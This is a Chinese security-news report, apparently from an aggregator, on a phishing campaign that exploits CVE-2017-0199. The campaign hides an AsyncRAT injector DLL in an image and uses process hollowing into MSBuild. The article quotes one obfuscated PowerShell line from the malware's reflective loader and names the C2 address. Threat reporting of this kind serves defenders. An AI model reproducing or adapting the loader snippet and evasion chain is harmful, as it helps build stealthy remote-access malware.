安全客 04月25日 09:58
警惕!新型隐写术攻击活动利用 Microsoft Office 漏洞传播 AsyncRAT
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

网络安全研究人员发现一起复杂的恶意软件攻击,攻击者利用隐写术将恶意代码藏匿于图像文件中。攻击链利用Microsoft Office旧漏洞CVE-2017-0199,传播远程访问木马AsyncRAT,使攻击者可完全控制受害者系统。攻击始于包含恶意Office文档的网络钓鱼邮件,触发远程HTA脚本下载,再下载被植入木马的Windows实用程序Prnport.vbs。该文件构建并执行复杂的PowerShell脚本,下载含隐藏恶意代码的图像文件。攻击的创新点在于隐写技术,将恶意DLL隐藏在图像中,提取出的代码运用进程空洞化技术将AsyncRAT注入合法进程,使其伪装成受信任的Windows进程。

🎣 攻击者通过网络钓鱼邮件传播恶意软件,邮件中包含利用 CVE-2017-0199 漏洞的 Microsoft Office 文档,该漏洞允许在无需用户交互的情况下下载和执行远程 HTA 脚本。

🖼️ 攻击活动利用隐写术,将恶意注入器 DLL 隐藏在看似无害的图像文件中。PowerShell 脚本通过定位图像数据中的特定 Base64 标记来提取隐藏代码,绕过传统的安全控制。

⚙️ 提取出的 DLL 文件名为 “Microsoft.Win32.TaskScheduler”,它运用进程空洞化技术将 AsyncRAT 的有效载荷注入到一个合法的 MSBuild 进程中,使恶意软件能够伪装成受信任的 Windows 进程运行。

📡 最终的有效载荷 AsyncRAT 会与位于 148.113.214.176:7878 的命令与控制服务器进行通信,为攻击者提供远程桌面访问、键盘记录等功能。

网络安全研究人员发现了一场复杂的恶意软件攻击活动,该活动运用了隐写技术,将恶意代码隐藏在看似无害的图像文件中。

这条攻击链利用了 Microsoft Office 的一个旧漏洞(CVE-2017-0199),最终传播了 AsyncRAT,这是一种远程访问木马,能够让攻击者完全控制受害者的系统。

攻击始于包含恶意Microsoft Office 文档的网络钓鱼电子邮件,这些文档旨在利用 CVE-2017-0199 漏洞,该漏洞于 2017 年 4 月首次被报告。

当这些文档被打开时,无需任何用户交互,它们就会触发远程 HTA 脚本的下载和执行。随后,该 HTA 脚本会下载一个被植入木马的合法 Windows 实用程序 Prnport.vbs。

一旦执行,被篡改的 Prnport.vbs 文件会构建并执行一个复杂的 PowerShell 脚本,该脚本会下载一个包含隐藏恶意代码的图像文件。

这个 PowerShell 脚本乍一看似乎无害,但包含了多种用于逃避检测的混淆技术。

Sophos 的研究人员认为,这场攻击活动特别危险,因为它具有多阶段的特性,并且使用了隐写技术来绕过传统的安全控制措施。

一位研究这场攻击活动的 Sophos 分析师指出:“这次攻击展示了威胁行为者的技术在不断演变。通过将恶意代码隐藏在普通图像中,攻击者可以绕过许多不会检查图像文件中是否存在可执行内容的安全解决方案。”

攻击流程

这次攻击最具创新性的方面在于所使用的隐写技术,即把恶意注入器动态链接库(DLL)隐藏在一个看似无害的图像文件中。

当受害者打开被篡改的图像时,他们看到的只是一张普通的照片,却不知道恶意代码就隐藏在其中。

PowerShell 脚本通过在图像数据中定位特定的 Base64 标记(> 和 >)来提取隐藏的代码。

提取出的代码显示出一个名为 “Microsoft.Win32.TaskScheduler” 的 DLL 文件,它运用进程空洞化技术将 AsyncRAT 的有效载荷注入到一个合法的 MSBuild 进程中。

这种技术使得恶意软件能够伪装成一个受信任的 Windows 进程来运行,这大大增加了检测的难度。

\(injectorReflection = [Reflection.Assembly]::(‘Lo’ + ‘ad’)(\)decodedInjector); \(executeMethod = [dnlib.IO.Home].(‘GetM’ + ‘ethod’)(‘VAI’).(‘Inv’ + ‘oke’)(\)null, @($finalPayloadURL, $null, $null, $null, “MsBuild”))

最终的有效载荷 AsyncRAT 会与位于 148.113.214.176:7878 的命令与控制服务器进行通信。

这个开源的远程访问工具为攻击者提供了广泛的功能,包括远程桌面访问、键盘记录,以及部署包括勒索软件在内的其他恶意软件的能力。

 

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

恶意软件 隐写术 AsyncRAT 网络安全
相关文章